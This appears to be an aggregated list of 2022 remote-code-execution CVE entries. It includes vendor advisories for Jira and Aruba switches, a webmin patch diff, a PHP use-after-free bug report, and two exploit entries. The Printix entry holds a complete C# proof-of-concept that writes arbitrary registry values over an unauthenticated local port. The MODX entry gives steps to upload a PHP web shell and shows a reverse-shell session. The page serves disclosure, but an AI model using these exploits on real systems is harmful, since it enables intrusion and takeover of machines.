.NET and Visual Studio Remote Code Execution Vulnerability.

CVE-2022-24512

Azure Site Recovery Remote Code Execution Vulnerability

CVE-2022-24520

CVE-2022-24517

Microsoft Exchange Server Remote Code Execution Vulnerability.

CVE-2022-23277

This issue exists to document that a security improvement in the way that Jira Server and Data Center use templates has been implemented. Affected versions of Atlassian Jira Server and Data Center allowed remote attackers with system administrator permissions to execute arbitrary code via Template Injection leading to Remote Code Execution (RCE) in the Email Templates feature. The affected versions are before version 8.13.15, and from version 8.14.0 before 8.20.3.

This issue exists to document that a security improvement in the way that Jira Server and Data Center use templates has been implemented.

Affected versions of Atlassian Jira Server and Data Center allow remote attackers with administrator permissions to execute arbitrary code via Template Injection leading to Remote Code Execution (RCE) in the Email Templates feature.

The affected versions are before version 8.13.15, and from version 8.14.0 before 8.20.3.

**Affected versions:**

*   version < 8.13.15
*   8.14.0 ≤ version < 8.20.3

**Fixed versions:**

*   8.13.15
*   8.20.3
*   8.21.0

CVE-2021-43944: [JRASERVER-73072] Template Injection in Email Templates leads to code execution on Jira Service Management Server - CVE-2021-43944

Printix Secure Cloud Print Management through 1.3.1106.0 incorrectly uses Privileged APIs to modify values in HKEY_LOCAL_MACHINE via UITasks.PersistentRegistryData.

**Printix Client 1.3.1106.0 - Remote Code Execution (RCE)**

    # Exploit Title: Printix Client 1.3.1106.0 - Remote Code Execution (RCE)
    # Date: 3/1/2022
    # Exploit Author: Logan Latvala
    # Vendor Homepage: https://printix.net
    # Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip
    # Version: <= 1.3.1106.0
    # Tested on: Windows 7, Windows 8, Windows 10, Windows 11
    # CVE : CVE-2022-25089
    # Github for project: https://github.com/ComparedArray/printix-CVE-2022-25089
    
    using Microsoft.Win32;
    using Newtonsoft.Json;
    using Newtonsoft.Json.Converters;
    using System;
    using System.Collections.Generic;
    using System.Diagnostics;
    using System.Linq;
    using System.Text;
    using System.Threading;
    using System.Threading.Tasks;
    
    /**
     * ________________________________________
     * 
     * Printix Vulnerability, CVE-2022-25089
     * Part of a Printix Vulnerability series
     * Author: Logan Latvala
     * Github: https://github.com/ComparedArray/printix-CVE-2022-25089
     * ________________________________________
     * 
     */
    
    
    namespace ConsoleApp1a
    {
    
    	public class PersistentRegistryData
    	{
    		public PersistentRegistryCmds cmd;
    
    		public string path;
    
    		public int VDIType;
    
    		public byte[] registryData;
    	}
    
    	[JsonConverter(typeof(StringEnumConverter))]
    	public enum PersistentRegistryCmds
    	{
    		StoreData = 1,
    		DeleteSubTree,
    		RestoreData
    	}
    	public class Session
    	{
    		public int commandNumber { get; set; }
    		public string host { get; set; }
    		public string data { get; set; }
    		public string sessionName { get; set; }
    		public Session(int commandSessionNumber = 0)
    		{
    			commandNumber = commandSessionNumber;
    			switch (commandSessionNumber)
    			{
    				//Incase it's initiated, kill it immediately.
    				case (0):
    					Environment.Exit(0x001);
    					break;
    
    				//Incase the Ping request is sent though, get its needed data.
    				case (2):
    					Console.WriteLine("\n What Host Address?  (DNS Names Or IP)\n");
    					Console.Write("IP: ");
    					host = Console.ReadLine();
    					Console.WriteLine("Host address set to: " + host);
    
    					data = "pingData";
    					sessionName = "PingerRinger";
    					break;
    
    				//Incase the RegEdit request is sent though, get its needed data.
    				case (49):
    					Console.WriteLine("\n What Host Address?  (DNS Names Or IP)\n");
    					Console.Write("IP: ");
    					host = Console.ReadLine();
    					Console.WriteLine("Host address set to: " + host);
    
    					PersistentRegistryData persistentRegistryData = new PersistentRegistryData();
    					persistentRegistryData.cmd = PersistentRegistryCmds.RestoreData;
    					persistentRegistryData.VDIType = 12; //(int)DefaultValues.VDIType;
    														 //persistentRegistryData.path = "printix\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName";
    					Console.WriteLine("\n What Node starting from \\\\Local-Machine\\ would you like to select? \n");
    					Console.WriteLine("Example: HKEY_LOCAL_MACHINE\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName\n");
    					Console.WriteLine("You can only change values in HKEY_LOCAL_MACHINE");
    					Console.Write("Registry Node: ");
    					persistentRegistryData.path = "" + Console.ReadLine().Replace("HKEY_LOCAL_MACHINE","printix");
    					Console.WriteLine("Full Address Set To:  " + persistentRegistryData.path);
    
    					//persistentRegistryData.registryData = new byte[2];
    					//byte[] loader = selectDataType("Intel(R) Capability Licensing stuffidkreally", RegistryValueKind.String);
    
    					Console.WriteLine("\n What Data type are you using? \n1. String 2. Dword  3. Qword 4. Multi String  \n");
    					Console.Write("Type:  ");
    					int dataF = int.Parse(Console.ReadLine());
    					Console.WriteLine("Set Data to: " + dataF);
    
    					Console.WriteLine("\n What value is your type?  \n");
    					Console.Write("Value:  ");
    					string dataB = Console.ReadLine();
    					Console.WriteLine("Set Data to: " + dataF);
    
    					byte[] loader = null;
    					List<byte> byteContainer = new List<byte>();
    					//Dword = 4
    					//SET THIS NUMBER TO THE TYPE OF DATA YOU ARE USING! (CHECK ABOVE FUNCITON selectDataType()!)
    
    					switch (dataF)
    					{
    						case (1):
    
    							loader = selectDataType(dataB, RegistryValueKind.String);
    							byteContainer.Add(1);
    							break;
    						case (2):
    							loader = selectDataType(int.Parse(dataB), RegistryValueKind.DWord);
    							byteContainer.Add(4);
    							break;
    						case (3):
    							loader = selectDataType(long.Parse(dataB), RegistryValueKind.QWord);
    							byteContainer.Add(11);
    							break;
    						case (4):
    							loader = selectDataType(dataB.Split('%'), RegistryValueKind.MultiString);
    							byteContainer.Add(7);
    							break;
    
    					}
    
    					int pathHolder = 0;
    					foreach (byte bit in loader)
    					{
    						pathHolder++;
    						byteContainer.Add(bit);
    					}
    
    					persistentRegistryData.registryData = byteContainer.ToArray();
    					//added stuff:
    
    					//PersistentRegistryData data = new PersistentRegistryData();
    					//data.cmd = PersistentRegistryCmds.RestoreData;
    					//data.path = "";
    
    
    					//data.cmd 
    					Console.WriteLine(JsonConvert.SerializeObject(persistentRegistryData));
    					data = JsonConvert.SerializeObject(persistentRegistryData);
    
    					break;
    				//Custom cases, such as custom JSON Inputs and more.
    				case (100):
    					Console.WriteLine("\n What Host Address?  (DNS Names Or IP)\n");
    					Console.Write("IP: ");
    					host = Console.ReadLine();
    					Console.WriteLine("Host address set to: " + host);
    
    					Console.WriteLine("\n What Data Should Be Sent?\n");
    					Console.Write("Data: ");
    					data = Console.ReadLine();
    					Console.WriteLine("Data set to: " + data);
    
    					Console.WriteLine("\n What Session Name Should Be Used? \n");
    					Console.Write("Session Name: ");
    					sessionName = Console.ReadLine();
    					Console.WriteLine("Session name set to: " + sessionName);
    					break;
    			}
    
    
    		}
    		public static byte[] selectDataType(object value, RegistryValueKind format)
    		{
    			byte[] array = new byte[50];
    
    			switch (format)
    			{
    				case RegistryValueKind.String: //1
    					array = Encoding.UTF8.GetBytes((string)value);
    					break;
    				case RegistryValueKind.DWord://4
    					array = ((!(value.GetType() == typeof(int))) ? BitConverter.GetBytes((long)value) : BitConverter.GetBytes((int)value));
    					break;
    				case RegistryValueKind.QWord://11
    					if (value == null)
    					{
    						value = 0L;
    					}
    					array = BitConverter.GetBytes((long)value);
    					break;
    				case RegistryValueKind.MultiString://7 
    					{
    						if (value == null)
    						{
    							value = new string[1] { string.Empty };
    						}
    						string[] array2 = (string[])value;
    						foreach (string s in array2)
    						{
    							byte[] bytes = Encoding.UTF8.GetBytes(s);
    							byte[] second = new byte[1] { (byte)bytes.Length };
    							array = array.Concat(second).Concat(bytes).ToArray();
    						}
    						break;
    					}
    			}
    			return array;
    		}
    	}
    	class CVESUBMISSION
        {
    		static void Main(string[] args)
    		{
    		FORCERESTART:
    			try
    			{
    
    				//Edit any registry without auth: 
    				//Use command 49, use the code provided on the desktop...
    				//This modifies it directly, so no specific username is needed. :D
    
    				//The command parameter, a list of commands is below.
    				int command = 43;
    
    				//To force the user to input variables or not.
    				bool forceCustomInput = false;
    
    				//The data to send, this isn't flexible and should be used only for specific examples.
    				//Try to keep above 4 characters if you're just shoving things into the command.
    				string data = "{\"profileID\":1,\"result\":true}";
    
    				//The username to use.
    				//This is to fulfill the requriements whilst in development mode.
    				DefaultValues.CurrentSessName = "printixMDNs7914";
    
    				//The host to connect to. DEFAULT= "localhost"
    				string host = "192.168.1.29";
    
    			//								Configuration Above
    
    			InvalidInputLabel:
    				Console.Clear();
    				Console.WriteLine("Please select the certificate you want to use with port 21338.");
    				//Deprecated, certificates are no longer needed to verify, as clientside only uses the self-signed certificates now.
    				Console.WriteLine("Already selected, client authentication isn't needed.");
    
    				Console.WriteLine(" /───────────────────────────\\ ");
    				Console.WriteLine("\nWhat would you like to do?");
    				Console.WriteLine("\n	1. Send Ping Request");
    				Console.WriteLine("	2. Send Registry Edit Request");
    				Console.WriteLine("	3. Send Custom Request");
    				Console.WriteLine("	4. Experimental Mode (Beta)\n");
    				Console.Write("I choose option # ");
    
    				try
    				{
    					switch (int.Parse(Console.ReadLine().ToLower()))
    					{
    						case (1):
    							Session session = new Session(2);
    
    							command = session.commandNumber;
    							host = session.host;
    							data = session.data;
    							DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200);
    
    
    
    							break;
    						case (2):
    							Session sessionTwo = new Session(49);
    
    							command = sessionTwo.commandNumber;
    							host = sessionTwo.host;
    							data = sessionTwo.data;
    							DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200);
    
    							break;
    						case (3):
    
    							Console.WriteLine("What command number do you want to input?");
    							command = int.Parse(Console.ReadLine().ToString());
    							Console.WriteLine("What IP would you like to use? (Default = localhost)");
    							host = Console.ReadLine();
    							Console.WriteLine("What data do you want to send? (Keep over 4 chars if you are not sure!)");
    							data = Console.ReadLine();
    
    							Console.WriteLine("What session name do you want to use? ");
    							DefaultValues.CurrentSessName = Console.ReadLine();
    							break;
    						case (4):
    							Console.WriteLine("Not yet implemented.");
    							break;
    					}
    				}
    				catch (Exception e)
    				{
    					Console.WriteLine("Invalid Input!");
    					goto InvalidInputLabel;
    				}
    				
    				Console.WriteLine("Proof Of Concept For CVE-2022-25089 | Version: 1.3.24 | Created by Logan Latvala");
    				Console.WriteLine("This is a RAW API, in which you may get unintended results from usage.\n");
    
    				CompCommClient client = new CompCommClient();
    
    
    				byte[] responseStorage = new byte[25555];
    				int responseCMD = 0;
    				client.Connect(host, 21338, 3, 10000);
    
    				client.SendMessage(command, Encoding.UTF8.GetBytes(data));
    				// Theory: There is always a message being sent, yet it doesn't read it, or can't intercept it.
    				// Check for output multiple times, and see if this is conclusive.
    
    
    
    				//client.SendMessage(51, Encoding.ASCII.GetBytes(data));
    				new Thread(() => {
    					//Thread.Sleep(4000);
    					if (client.Connected())
    					{
    						int cam = 0;
    						// 4 itterations of loops, may be lifted in the future.
    						while (cam < 5)
    						{
    
    							//Reads the datastream and keeps returning results.
    							//Thread.Sleep(100);
    							try
    							{
    								try
    								{
    									if (responseStorage?.Any() == true)
    									{
    										//List<byte> byo1 =  responseStorage.ToList();
    										if (!Encoding.UTF8.GetString(responseStorage).Contains("Caption"))
    										{
    											foreach (char cam2 in Encoding.UTF8.GetString(responseStorage))
    											{
    												if (!char.IsWhiteSpace(cam2) && char.IsLetterOrDigit(cam2) || char.IsPunctuation(cam2))
    												{
    													Console.Write(cam2);
    												}
    											}
    										}else
                                            {
    											
                                            }
    									}
    
    								}
    								catch (Exception e) { Debug.WriteLine(e); }
    								client.Read(out responseCMD, out responseStorage);
    
    							}
    							catch (Exception e)
    							{
    								goto ReadException;
    							}
    							Thread.Sleep(100);
    							cam++;
    							//Console.WriteLine(cam);
    						}
    
    					
    
    
    					}
    					else
    					{
    						Console.WriteLine("[WARNING]: Client is Disconnected!");
    					}
    				ReadException:
    					try
    					{
    						Console.WriteLine("Command Variable Response: " + responseCMD);
    						Console.WriteLine(Encoding.UTF8.GetString(responseStorage) + " || " + responseCMD);
    						client.disConnect();
    					}
    					catch (Exception e)
    					{
    						Console.WriteLine("After 4.2 Seconds, there has been no response!");
    						client.disConnect();
    					}
    				}).Start();
    
    				Console.WriteLine(responseCMD);
    				Console.ReadLine();
    
    			}
    
    			catch (Exception e)
    			{
    				Console.WriteLine(e);
    				Console.ReadLine();
    
    				//Environment.Exit(e.HResult);
    			}
    
    			goto FORCERESTART;
    		}
    	}
    }

CVE-2022-25089: Offensive Security’s Exploit Database Archive

Multiple unauthenticated command injection vulnerabilities were discovered in the AOS-CX API interface in Aruba CX 6200F Switch Series, Aruba 6300 Switch Series, Aruba 6400 Switch Series, Aruba 8320 Switch Series, Aruba 8325 Switch Series, Aruba 8400 Switch Series, Aruba CX 8360 Switch Series version(s): AOS-CX 10.06.xxxx: 10.06.0170 and below, AOS-CX 10.07.xxxx: 10.07.0050 and below, AOS-CX 10.08.xxxx: 10.08.1030 and below, AOS-CX 10.09.xxxx: 10.09.0002 and below. Aruba has released upgrades for Aruba AOS-CX devices that address these security vulnerabilities.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Aruba Product Security Advisory =============================== Advisory ID: ARUBA-PSA-2022-004 CVE: CVE-2021-41000, CVE-2021-41001, CVE-2021-41002, CVE-2021-41003, CVE-2021-3712, CVE-2002-20001, CVE-2017-6168, CVE-2017-17382, CVE-2017-17427, CVE-2017-17428, CVE-2017-12373, CVE-2017-13098, CVE-2017-1000385, CVE-2017-13099, CVE-2016-6883, CVE-2012-5081 Publication Date: 2022-Feb-22 Last Update: 2022-Apr-06 Status: Confirmed Severity: High Revision: 2 Title ===== AOS-CX Switches Multiple Vulnerabilities Overview ======== Aruba has released updates for wired switch products running AOS-CX that address multiple security vulnerabilities. Affected Products ================= These vulnerabilities affect Aruba 4100i,6100,6200,6300, 6400,8320,8325,8360, and 8400 model switches running the following version of the AOS-CX firmware: - AOS-CX 10.06.xxxx: 10.06.0170 and below - AOS-CX 10.07.xxxx: 10.07.0050 and below - AOS-CX 10.08.xxxx: 10.08.1030 and below - AOS-CX 10.09.xxxx: 10.09.0002 and below Not all vulnerabilities in this advisory affect all AOS-CX branches. If an AOS-CX branch is not listed as affected, it means that any AOS-CX version in that given branch is not affected. For example, the 10.06.xxxx branch is not affected by CVE-2021-41001 and the 10.09.xxxx branch is not affected by CVE-2021-3712. The following unsupported branches of AOS-CX software were not validated and may contain these vulnerabilities: - AOS-CX 10.05.xxxx and below Unaffected Products =================== Any other Aruba products not listed above, including Aruba Intelligent Edge Switches and HPE OfficeConnect Switches are not affected by these vulnerabilities. Details ======= Multiple Authenticated Remote Code Execution in AOS-CX Command Line Interface (CVE-2021-41000) --------------------------------------------------------------------- Multiple vulnerabilities exist in the AOS-CX command line interface that could lead to authenticated command injection. Successful exploitation of these vulnerabilities could result in the ability to execute arbitrary commands as a privileged user on the underlying operating system. This allows an attacker to fully compromise the underlying operating system on the device running AOS-CX. Internal references: ATLAX-27, ATLAX-28, ATLAX-38 Severity: High CVSSv3.1 Overall Score: 8.8 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Erik de Jong (bugcrowd.com/erikdejong) via Aruba's Bug Bounty Program. Affected Versions: AOS-CX 10.06.xxxx: 10.06.0170 and below AOS-CX 10.07.xxxx: 10.07.0020 and below AOS-CX 10.08.xxxx: 10.08.0001 and below Resolved Versions: AOS-CX 10.06.xxxx: 10.06.0180 and above AOS-CX 10.07.xxxx: 10.07.0030 and above AOS-CX 10.08.xxxx: 10.08.0010 and above AOS-CX 10.09.xxxx: 10.09.0001 and above Diffie-Hellman Key Agreement Protocol Vulnerability (CVE-2002-20001) --------------------------------------------------------------------- The Diffie-Hellman Key Agreement Protocol allows remote attackers (from the client side) to send arbitrary numbers that are actually not public keys and trigger expensive server-side DHE modular-exponentiation calculations, aka a D(HE)ater attack. Successful exploitation of this vulnerability can lead to a denial of service on the AOS-CX switch. Internal Reference: ATLAX-51 Severity: High CVSSv3.1 Overall Score: 7.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Discovery: This vulnerability was discovered and reported by Jean-francois Raymond and Anton Stiglic. Please see the following link for more details: https://www.researchgate.net/publication/2401745\_Security\_Issues\_in\_the\_Diffie-Hellman\_Key\_Agreement\_Protocol Affected Versions: AOS-CX 10.06.xxxx: 10.06.0170 and below AOS-CX 10.07.xxxx: 10.07.0050 and below AOS-CX 10.08.xxxx: 10.08.1030 and below AOS-CX 10.09.xxxx: 10.09.0002 and below Resolved Versions: AOS-CX 10.06.xxxx: 10.06.0180 and above AOS-CX 10.07.xxxx: 10.07.0061 and above AOS-CX 10.08.xxxx: 10.08.1040 and above AOS-CX 10.09.xxxx: 10.09.0010 and above Authenticated Read Buffer Overruns Processing ASN.1 Strings in AOS-CX (CVE-2021-3712) --------------------------------------------------------------------- A vulnerability exists which allows an authenticated attacker to access sensitive information on the AOS-CX web-based management interface. Successful exploitation allows an attacker to gain access to some data in a cleartext format possibly exposing other network infrastructure to further compromise. Internal references: ATLAX-39 Severity: High CVSSv3.1 Overall Score: 7.4 CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H Discovery: This vulnerability was discovered and reported by Ingo Schwarze. Affected Versions: AOS-CX 10.06.xxxx: 10.06.0170 and below AOS-CX 10.07.xxxx: 10.07.0050 and below AOS-CX 10.08.xxxx: 10.08.1030 and below Resolved Versions: AOS-CX 10.06.xxxx: 10.06.0180 and above AOS-CX 10.07.xxxx: 10.07.0061 and above AOS-CX 10.08.xxxx: 10.08.1040 and above AOS-CX 10.09.xxxx: 10.09.0001 and above Authenticated Remote Code Execution in AOS-CX Network Analytics Engine(NAE) (CVE-2021-41001) -------------------------------------------------------------------- Authenticated command injection vulnerabilities exist in the AOS-CX Network Analytics Engine via NAE scripts. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system, leading to a complete compromise of the switch running AOS-CX. Internal references: ATLAX-37 Severity: High CVSSv3.1 Overall Score: 7.2 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Discovery: This vulnerability was discovered and reported by Erik de Jong (bugcrowd.com/erikdejong) via Aruba's Bug Bounty Program. Affected Versions: AOS-CX 10.07.xxxx: 10.07.0050 and below AOS-CX 10.08.xxxx: 10.08.1030 and below AOS-CX 10.09.xxxx: 10.09.0002 and below Resolved Versions: AOS-CX 10.07.xxxx: 10.07.0061 and above AOS-CX 10.08.xxxx: 10.08.1040 and above AOS-CX 10.09.xxxx: 10.09.0010 and above Multiple Unauthenticated Command Injection Vulnerabilities in AOS-CX API Interface (CVE-2021-41003) --------------------------------------------------------------------- Vulnerabilities in the web-based management interface API of AOS-CX that could allow an unauthenticated remote attacker to conduct Cross Site Scripting(XSS) and HTML injection attacks. It would allow an attacker to execute arbitrary code in a victim's browser. Internal Reference: ATLAX-50 Severity: Medium CVSSv3.1 Overall Score: 6.1 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Discovery: This vulnerability was discovered and reported by mooimacow (bugcrowd.com/mooimacow) via Aruba's Bug Bounty Program. Affected Versions: AOS-CX 10.06.xxxx: 10.06.0170 and below AOS-CX 10.07.xxxx: 10.07.0050 and below AOS-CX 10.08.xxxx: 10.08.1030 and below AOS-CX 10.09.xxxx: 10.09.0002 and below Resolved Versions: AOS-CX 10.06.xxxx: 10.06.0180 and above AOS-CX 10.07.xxxx: 10.07.0061 and above AOS-CX 10.08.xxxx: 10.08.1040 and above AOS-CX 10.09.xxxx: 10.09.0010 and above Return Of Bleichenbacher's Oracle Threat (CVE-2017-6168, CVE-2017-17382, CVE-2017-17427, CVE-2017-17428, CVE-2017-12373, CVE-2017-13098, CVE-2017-1000385, CVE-2017-13099, CVE-2016-6883, CVE-2012-5081) -------------------------------------------------------------------- A vulnerability exists within AOS-CX's cryptographic library that provides a weak Bleichenbacher oracle when any TLS cipher suite using RSA key exchange is negotiated. An attacker may be able to recover private keys for X.509 certificates. This vulnerability is referred to as "ROBOT." Please see the following link for more details: https://robotattack.org/ Internal references: ATLAX-36 Severity: Medium CVSSv3.1 Overall Score: 5.9 CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N Discovery: This vulnerability was discovered and reported by Hanno Böck, Juraj Somorovsky, and Craig Young. Affected Versions: AOS-CX 10.06.xxxx: 10.06.0120 and below AOS-CX 10.07.xxxx: 10.07.0009 and below Resolved Versions: AOS-CX 10.06.xxxx: 10.06.0130 and above AOS-CX 10.07.xxxx: 10.07.0010 and above AOS-CX 10.08.xxxx: 10.08.0001 and above Multiple Authenticated Remote Path Traversal AOS-CX Command Line Interface (CVE-2021-41002) --------------------------------------------------------------------- Multiple authenticated path traversal vulnerabilities exist in the AOS-CX command line interface. Successful exploitation of this vulnerability could result in the ability to impact the integrity of critical files on the underlying operating system. This allows an attacker to impact the availability of the AOS-CX switch and may allow for modification of sensitive data. Internal references: ATLAX-33, ATLAX-34 Severity: Medium CVSSv3.1 Overall Score: 5.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:L Discovery: These vulnerabilities were discovered and reported by Erik de Jong (bugcrowd.com/erikdejong) via Aruba's Bug Bounty Program. Affected Versions: AOS-CX 10.06.xxxx: 10.06.0170 and below AOS-CX 10.07.xxxx: 10.07.0050 and below AOS-CX 10.08.xxxx: 10.08.1030 and below AOS-CX 10.09.xxxx: 10.09.0002 and below Resolved Versions: AOS-CX 10.06.xxxx: 10.06.0180 and above AOS-CX 10.07.xxxx: 10.07.0061 and above AOS-CX 10.08.xxxx: 10.08.1040 and above AOS-CX 10.09.xxxx: 10.09.0010 and above Exploitation and Public Discussion ================================== Aruba is not aware of any public discussion or exploit code that target these specific vulnerabilities as of the release date of the advisory. Revision History ================ Revision 1 / 2022-Feb-22 / Initial release Revision 2 / 2022-Apr-06 / Updated CVSSv3.1 Overall Score Version Aruba SIRT Security Procedures ============================== Complete information on reporting security vulnerabilities in Aruba Networks products, obtaining assistance with security incidents is available at: http://www.arubanetworks.com/support-services/security-bulletins/ For reporting \*NEW\* Aruba Networks security issues, email can be sent to aruba-sirt(at)hpe.com. For sensitive information we encourage the use of PGP encryption. Our public keys can be found at: http://www.arubanetworks.com/support-services/security-bulletins/ (c) Copyright 2022 by Aruba, a Hewlett Packard Enterprise company. This advisory may be redistributed freely after the release date given at the top of the text, provided that the redistributed copies are complete and unmodified, including all data and version information. -----BEGIN PGP SIGNATURE----- iQEzBAEBCAAdFiEEMd5pP5EnbG7Y0fo5mP4JykWFhtkFAmIKeYAACgkQmP4JykWF htlHIwf/Wg7bLFjwR2I8B4AW27g5ZF7+kZDANC0fDcGbIump0Vk9kYpixZFV0PC6 emZ1HG+CMnlzJC/tSiTTUZF4+aDwJlJgtX3la4Em/bZGhFZoAc0YyM4p9U8QZ+fw KUqa5OklYZ7dWqQfcJMQuRfJwAx+gBnSG6hYf5dOarAxNNWYJpDvPWzQ6YNbNOZH 5anZqEuUOMpjyWYrClqvc/l2L3Hzk4s99moKqiKVQkUd+6MLGrrj7oDAag/IEINQ TZIZp+Kfrmgzlc/C8GQNjAbwyck52iNsMYTd2WkRT6SssooKI/Ru8+5EaEbLeeq1 TEO88iGzPy+g28wrcVYaNaUdHY8i/A== =gxkM -----END PGP SIGNATURE-----

CVE-2021-41003

Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.

@@ -5144,7 +5144,8 @@ sub init\_config

}

if ($module\_name && !$main::no\_acl\_check &&

!defined($ENV{'FOREIGN\_MODULE\_NAME'}) &&

(!defined($ENV{'FOREIGN\_MODULE\_NAME'}) ||

defined($ENV{'FOREIGN\_MODULE\_SEC\_CHECK'})) &&

$main::webmin\_script\_type eq 'web') {

# Check if the HTTP user can access this module

if (!&foreign\_available($module\_name)) {

CVE-2022-0824: Foreign module may need a check · webmin/webmin@39ea464

In PHP versions 7.4.x below 7.4.28, 8.0.x below 8.0.16, and 8.1.x below 8.1.3, when using filter functions with FILTER_VALIDATE_FLOAT filter and min/max limits, if the filter fails, there is a possibility to trigger use of allocated memory after free, which can result it crashes, and potentially in overwrite of other memory chunks and RCE. This issue affects: code that uses FILTER_VALIDATE_FLOAT with min/max limits.

Sec Bug #81708

UAF due to php\_filter\_float() failing for ints

Submitted:

2022-01-30 09:00 UTC

Modified:

2022-02-14 06:07 UTC

From:

dukk at softdev dot online

Assigned:

stas (profile)

Status:

Closed

Package:

Filter related

PHP Version:

8.0.15

OS:

centos 8

Private report:

No

CVE-ID:

2021-21708

 **\[2022-01-30 09:00 UTC\] dukk at softdev dot online**

Description:
------------
NGINX + php-fpm (versions tested 7.4.27, 8.0.15): 
1. place files from URL in webserver directory
2. Requires PostgreSQL valid (nonce) connection string (edit B.php)
3. make request (curl "http://127.0.0.1/A.php")
4. obtain HTTP 502 in client and php-fpm process on server

in A.php change xml attribute val to "+11."  - all if fine. no crash.


this PoC is extracted (stripped-down) from large code-base.

Test script:
---------------
https://github.com/MrdUkk/php-sigsegv

Expected result:
----------------
expected result is seening
PHP Fatal error:  Uncaught Error: Class "APIException" not found in A.php:27


Actual result:
--------------
HTTP 502 and php-fpm server process crashed

Program received signal SIGSEGV, Segmentation fault.
0x000055ba505e7295 in \_emalloc ()
(gdb) bt
#0  0x000055ba505e7295 in \_emalloc ()
#1  0x000055ba505e810f in \_ecalloc ()
#2  0x000055ba504a4977 in timelib\_get\_time\_zone\_info ()
#3  0x000055ba504a6a7f in timelib\_unixtime2local ()
#4  0x000055ba50480c41 in php\_format\_date ()
#5  0x000055ba504572bc in php\_log\_err\_with\_severity ()
#6  0x000055ba5045771a in php\_error\_cb ()
#7  0x000055ba5045c3aa in zend\_error\_va\_list ()
#8  0x000055ba5045c991 in zend\_error ()
#9  0x000055ba5045833b in php\_verror ()
#10 0x000055ba5045845c in php\_error\_docref ()
#11 0x00007f641246afd4 in pdo\_raise\_impl\_error.cold () from target:/usr/lib64/php/modules/pdo.so
#12 0x00007f6412471e72 in zim\_PDOStatement\_bindValue () from target:/usr/lib64/php/modules/pdo.so
#13 0x000055ba50695a50 in execute\_ex ()
#14 0x000055ba50696861 in zend\_execute ()
#15 0x000055ba5060d2db in zend\_execute\_scripts ()
#16 0x000055ba505aa488 in php\_execute\_script ()
#17 0x000055ba50476af9 in main ()
(gdb)

**Patches**

Add a Patch

**Pull Requests**

Add a Pull Request

**History**

AllCommentsChangesGit/SVN commitsRelated reports

 **\[2022-01-31 14:47 UTC\] cmb@php.net**

\-Summary: PHP-FPM sigsegv +Summary: UAF due to php\_filter\_float() failing for ints \-Status: Open +Status: Verified \-Package: FPM related +Package: Filter related \-Assigned To: +Assigned To: stas

 **\[2022-02-14 06:00 UTC\] git@php.net**

\-Status: Verified +Status: Closed

 **\[2022-02-14 06:07 UTC\] stas@php.net**

\-CVE-ID: +CVE-ID: 2021-21708

CVE-2021-21708: UAF due to php_filter_float() failing for ints

MODX Revolution through 2.8.3-pl allows remote authenticated administrators to execute arbitrary code by uploading an executable file, because the Uploadable File Types setting can be changed by an administrator.

\# Exploit Title: Authenticated Remote Code Execution in MODX Revolution V2.8.3-pl

\# Remote Code Execution in MODX Revolution V2.8.3-pl and earlier allows remote attackers to execute arbitrary code via uploading a php web shell.

\# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718

\# Date: 26th Feb'2022

\# CVE ID: CVE-2022-26149

\# Confirmed on release 2.8.3-pl

\# Vendor: https://modx.com/download

###############################################

#Step1- Login with Admin Credentials

#Step2- Uploading .php files is disabled by default hence we need to abuse the functionality:

Add the php file extension under the "Uploadable File Types" option available in "System Settings"

#Step3- Now Goto Media=>Media Browser and upload the Shell.php

#Step4- Now visit http://IP\_Address/Shell.php and get the reverse shell:

listening on \[any\] 4477 ...

connect to \[192.168.56.1\] from (UNKNOWN) \[192.168.56.130\] 58056

bash: cannot set terminal process group (1445): Inappropriate ioctl for device

bash: no job control in this shell

daemon@debian:/opt/bitnami/modx$

Tag

#rce